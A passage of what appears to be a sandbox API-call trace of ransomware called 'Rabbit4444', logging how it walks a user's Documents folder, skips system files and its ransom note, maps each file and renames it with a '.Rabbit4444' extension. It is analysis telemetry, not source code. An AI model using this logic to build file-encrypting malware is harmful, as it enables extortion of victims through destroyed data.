(lpString1="H8Y_brCG8G6csUiI.docx", lpString2="boot") returned 1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2="ids.txt") returned -1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2="NTUSER.DAT") returned -1 [0049.541] lstrcpyW (in: lpString1=0x130eb6c, lpString2="H8Y_brCG8G6csUiI.docx" | out: lpString1="H8Y_brCG8G6csUiI.docx") returned="H8Y_brCG8G6csUiI.docx" [0049.541] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\H8Y_brCG8G6csUiI.docx", dwFileAttributes=0x0) returned 1 [0049.542] lstrlenW (lpString="H8Y_brCG8G6csUiI.docx") returned 21 [0049.542] lstrlenW (lpString="Rabbit4444") returned 10 [0049.542] lstrcmpiW (lpString1="csUiI.docx", lpString2="Rabbit4444") returned -1 [0049.542] lstrlenW (lpString=".dll") returned 4 [0049.542] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0049.542] lstrlenW (lpString=".lnk") returned 4 [0049.542] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0049.542] lstrlenW (lpString=".ini") returned 4 [0049.542] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0049.542] lstrlenW (lpString=".sys") returned 4 [0049.542] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0049.542] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\H8Y_brCG8G6csUiI.docx" (normalized: "c:\\users\\fd1hvy\\documents\\h8y_brcg8g6csuii.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.542] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.542] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14085279471) returned 1 [0049.542] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=10546) returned 1 [0049.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0049.542] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2c40, lpName=0x0) returned 0x298 [0049.542] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c40) returned 0x70000 [0049.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.543] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14085406359) returned 1 [0049.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0049.543] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.544] CloseHandle (hObject=0x298) returned 1 [0049.544] CloseHandle (hObject=0x278) returned 1 [0049.544] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\H8Y_brCG8G6csUiI.docx.Rabbit4444") returned 58 [0049.544] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\H8Y_brCG8G6csUiI.docx" (normalized: "c:\\users\\fd1hvy\\documents\\h8y_brcg8g6csuii.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\H8Y_brCG8G6csUiI.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\h8y_brcg8g6csuii.docx.rabbit4444"), dwFlags=0x1) returned 1 [0049.545] InterlockedExchangeAdd (in: Addend=0xff618, Value=10560 | out: Addend=0xff618) returned 21999968 [0049.545] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3614 [0049.545] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ed3d90, ftCreationTime.dwHighDateTime=0x1d4e132, ftLastAccessTime.dwLowDateTime=0xe0efb360, ftLastAccessTime.dwHighDateTime=0x1d528fd, ftLastWriteTime.dwLowDateTime=0xe0efb360, ftLastWriteTime.dwHighDateTime=0x1d528fd, nFileSizeHigh=0x0, nFileSizeLow=0x17c24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hYjJeP1.xlsx", cAlternateFileName="HYJJEP~1.XLS")) returned 1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="Rabbit4444.exe") returned -1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2=".") returned 1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="..") returned 1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="windows") returned -1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="bootmgr") returned 1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="pagefile.sys") returned -1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="boot") returned 1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="ids.txt") returned -1 [0049.545] lstrcmpiW (lpString1="hYjJeP1.xlsx", lpString2="NTUSER.DAT") returned -1 [0049.545] lstrcpyW (in: lpString1=0x130eb6c, lpString2="hYjJeP1.xlsx" | out: lpString1="hYjJeP1.xlsx") returned="hYjJeP1.xlsx" [0049.545] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\hYjJeP1.xlsx", dwFileAttributes=0x0) returned 1 [0049.546] lstrlenW (lpString="hYjJeP1.xlsx") returned 12 [0049.546] lstrlenW (lpString="Rabbit4444") returned 10 [0049.546] lstrcmpiW (lpString1="jJeP1.xlsx", lpString2="Rabbit4444") returned -1 [0049.546] lstrlenW (lpString=".dll") returned 4 [0049.546] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0049.546] lstrlenW (lpString=".lnk") returned 4 [0049.546] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0049.546] lstrlenW (lpString=".ini") returned 4 [0049.546] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0049.546] lstrlenW (lpString=".sys") returned 4 [0049.546] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0049.546] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\hYjJeP1.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\hyjjep1.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.546] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.546] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14085677577) returned 1 [0049.546] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=97316) returned 1 [0049.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0049.546] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17f30, lpName=0x0) returned 0x298 [0049.546] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17f30) returned 0x70000 [0049.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.549] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14085971201) returned 1 [0049.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0049.549] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.550] CloseHandle (hObject=0x298) returned 1 [0049.550] CloseHandle (hObject=0x278) returned 1 [0049.551] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\hYjJeP1.xlsx.Rabbit4444") returned 49 [0049.551] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\hYjJeP1.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\hyjjep1.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\hYjJeP1.xlsx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\hyjjep1.xlsx.rabbit4444"), dwFlags=0x1) returned 1 [0049.551] InterlockedExchangeAdd (in: Addend=0xff618, Value=97328 | out: Addend=0xff618) returned 22010528 [0049.551] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3615 [0049.551] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f346000, ftCreationTime.dwHighDateTime=0x1d4c8bc, ftLastAccessTime.dwLowDateTime=0xa76d7bf0, ftLastAccessTime.dwHighDateTime=0x1d4c8d0, ftLastWriteTime.dwLowDateTime=0xa76d7bf0, ftLastWriteTime.dwHighDateTime=0x1d4c8d0, nFileSizeHigh=0x0, nFileSizeLow=0x7c5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IM_wRbLvbAhaK_.csv", cAlternateFileName="IM_WRB~1.CSV")) returned 1 [0049.551] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.551] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.551] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="Rabbit4444.exe") returned -1 [0049.551] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2=".") returned 1 [0049.551] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="..") returned 1 [0049.551] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="windows") returned -1 [0049.551] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="bootmgr") returned 1 [0049.552] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="pagefile.sys") returned -1 [0049.552] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="boot") returned 1 [0049.552] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="ids.txt") returned 1 [0049.552] lstrcmpiW (lpString1="IM_wRbLvbAhaK_.csv", lpString2="NTUSER.DAT") returned -1 [0049.552] lstrcpyW (in: lpString1=0x130eb6c, lpString2="IM_wRbLvbAhaK_.csv" | out: lpString1="IM_wRbLvbAhaK_.csv") returned="IM_wRbLvbAhaK_.csv" [0049.552] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\IM_wRbLvbAhaK_.csv", dwFileAttributes=0x0) returned 1 [0049.552] lstrlenW (lpString="IM_wRbLvbAhaK_.csv") returned 18 [0049.552] lstrlenW (lpString="Rabbit4444") returned 10 [0049.552] lstrcmpiW (lpString1="bAhaK_.csv", lpString2="Rabbit4444") returned -1 [0049.552] lstrlenW (lpString=".dll") returned 4 [0049.552] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0049.552] lstrlenW (lpString=".lnk") returned 4 [0049.552] lstrcmpiW (lpString1=".csv", lpString2=".lnk") returned -1 [0049.552] lstrlenW (lpString=".ini") returned 4 [0049.552] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0049.552] lstrlenW (lpString=".sys") returned 4 [0049.552] lstrcmpiW (lpString1=".csv", lpString2=".sys") returned -1 [0049.552] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\IM_wRbLvbAhaK_.csv" (normalized: "c:\\users\\fd1hvy\\documents\\im_wrblvbahak_.csv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.552] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.552] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14086303200) returned 1 [0049.552] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=31835) returned 1 [0049.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0049.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0049.552] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f60, lpName=0x0) returned 0x298 [0049.553] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f60) returned 0x70000 [0049.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.554] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.554] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.554] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14086468495) returned 1 [0049.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0049.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0049.554] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.554] CloseHandle (hObject=0x298) returned 1 [0049.554] CloseHandle (hObject=0x278) returned 1 [0049.555] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\IM_wRbLvbAhaK_.csv.Rabbit4444") returned 55 [0049.555] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\IM_wRbLvbAhaK_.csv" (normalized: "c:\\users\\fd1hvy\\documents\\im_wrblvbahak_.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\IM_wRbLvbAhaK_.csv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\im_wrblvbahak_.csv.rabbit4444"), dwFlags=0x1) returned 1 [0049.556] InterlockedExchangeAdd (in: Addend=0xff618, Value=31840 | out: Addend=0xff618) returned 22107856 [0049.556] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3617 [0049.556] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="Rabbit4444.exe") returned -1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0049.556] lstrcmpiW (lpString1="My Music", lpString2="NTUSER.DAT") returned -1 [0049.556] lstrcpyW (in: lpString1=0x130eb6c, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0049.556] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music", dwFileAttributes=0x2412) returned 1 [0049.556] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Music\r\n") returned 53 [0049.556] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Music\r\n") returned 53 [0049.556] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.556] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x94a [0049.557] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x35, lpOverlapped=0x0) returned 1 [0049.558] CloseHandle (hObject=0x278) returned 1 [0049.559] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="Rabbit4444.exe") returned -1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0049.559] lstrcmpiW (lpString1="My Pictures", lpString2="NTUSER.DAT") returned -1 [0049.559] lstrcpyW (in: lpString1=0x130eb6c, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0049.559] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures", dwFileAttributes=0x2412) returned 1 [0049.560] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Pictures\r\n") returned 56 [0049.560] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Pictures\r\n") returned 56 [0049.560] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.560] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x97f [0049.560] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x38, lpOverlapped=0x0) returned 1 [0049.563] CloseHandle (hObject=0x278) returned 1 [0049.563] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="Rabbit4444.exe") returned -1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2=".") returned 1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="..") returned 1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="windows") returned -1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="bootmgr") returned 1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="pagefile.sys") returned -1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="boot") returned 1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="ids.txt") returned 1 [0049.563] lstrcmpiW (lpString1="My Shapes", lpString2="NTUSER.DAT") returned -1 [0049.563] lstrcpyW (in: lpString1=0x130eb6c, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0049.563] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes", dwFileAttributes=0x10) returned 1 [0049.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0049.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x48) returned 0x10b510 [0049.564] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6350 [0049.564] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0049.564] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.564] lstrcmpiW (lpString1="My Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.564] lstrcmpiW (lpString1="My Videos", lpString2="Rabbit4444.exe") returned -1 [0049.564] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0049.564] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0049.564] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0049.565] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0049.565] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0049.565] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0049.565] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0049.565] lstrcmpiW (lpString1="My Videos", lpString2="NTUSER.DAT") returned -1 [0049.565] lstrcpyW (in: lpString1=0x130eb6c, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0049.565] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos", dwFileAttributes=0x2412) returned 1 [0049.565] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Videos\r\n") returned 54 [0049.565] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Videos\r\n") returned 54 [0049.565] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.565] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0049.565] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x36, lpOverlapped=0x0) 